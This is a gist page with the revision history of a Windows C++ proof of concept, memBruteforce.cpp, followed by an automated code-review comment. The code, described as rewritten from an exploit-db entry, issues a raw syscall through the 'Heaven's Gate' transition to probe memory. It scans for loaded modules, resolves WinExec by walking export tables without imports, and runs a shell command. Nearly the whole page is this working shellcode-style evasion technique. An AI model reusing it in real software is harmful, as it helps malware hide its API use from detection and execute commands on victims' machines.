Revisions
aaaddress1 revised this gist
Oct 6, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ // memBruteforce.cpp by [email protected] // brute search loaded moudules in memory // rewrite from https://www.exploit-db.com/exploits/45293 #include <Windows.h> -
aaaddress1 created this gist
Oct 6, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,55 @@ // memBruteforce.cpp // brute search loaded moudules in memory // rewrite from https://www.exploit-db.com/exploits/45293 #include <Windows.h> #include <iostream> #pragma warning(disable:4996) bool isMemExist(size_t addr) { int retv; __asm { xor ebx, ebx push[addr] push ebx push ebx push ebx mov eax, 0x29 // ZwAccessCheckAndAuditAlarm call dword ptr fs : [0xc0] // Heaven's Gate add esp, 0x0c pop edx mov[retv], eax } return char(retv) != 5; } size_t bruteSearch_WinAPI(PCSTR apiName) { for (size_t addr = 0x1000; addr < 0xFF000000; addr += 0x1000) if (isMemExist(addr)) { if (PIMAGE_DOS_HEADER(addr)->e_magic == IMAGE_DOS_SIGNATURE) { char modulePath[MAX_PATH]; GetModuleFileNameA(HMODULE(addr), modulePath, sizeof(modulePath)); printf("[+] detect %s at %p\n", modulePath, addr); // parse export table auto nth = PIMAGE_NT_HEADERS(addr + PIMAGE_DOS_HEADER(addr)->e_lfanew); if (auto rva = nth->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) { auto eat = PIMAGE_EXPORT_DIRECTORY(addr + rva); auto nameArr = PDWORD(addr + eat->AddressOfNames); auto funcArr = PDWORD(addr + eat->AddressOfFunctions); auto nameOrd = PWORD(addr + eat->AddressOfNameOrdinals); for (size_t i = 0; i < eat->NumberOfFunctions; i++) if (!stricmp(PCHAR(addr + nameArr[i]), apiName)) return addr + funcArr[nameOrd[i]]; } } } return 0; } int main() { if (auto ptrWinExec = bruteSearch_WinAPI("WinExec")) (decltype(&WinExec)(ptrWinExec))("cmd /c whoami && pause", 1); return 0; }
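Review bot: The export-table loop in `bruteSearch_WinAPI` reads past the name arrays: `AddressOfNames` and `AddressOfNameOrdinals` hold `NumberOfNames` entries, but the loop bound is `eat->NumberOfFunctions`, which is larger whenever a module also exports by ordinal only, so `nameArr[i]` and `nameOrd[i]` become out-of-bounds reads inside the mapped image; the loop header should be `for (size_t i = 0; i < eat->NumberOfNames; i++)`. The `e_magic == IMAGE_DOS_SIGNATURE` test on the first page is also the only evidence that `addr` is an image base: `nth` is dereferenced without checking that `e_lfanew` stays inside probed memory or that `nth->Signature == IMAGE_NT_SIGNATURE`, so a stray `MZ` at a page boundary leads to an unchecked pointer dereference. A match whose function RVA lies inside the export directory is a forwarder string rather than code, and `main` would then call that string as `WinExec`; a comment noting that forwarded exports are not handled, or a range check on `funcArr[nameOrd[i]]` against the export directory, would make the limitation visible. The hard-coded syscall number `0x29` and the `fs:[0xc0]` transition in `isMemExist` tie the probe to one specific 32-bit Windows build, which the header comment should state.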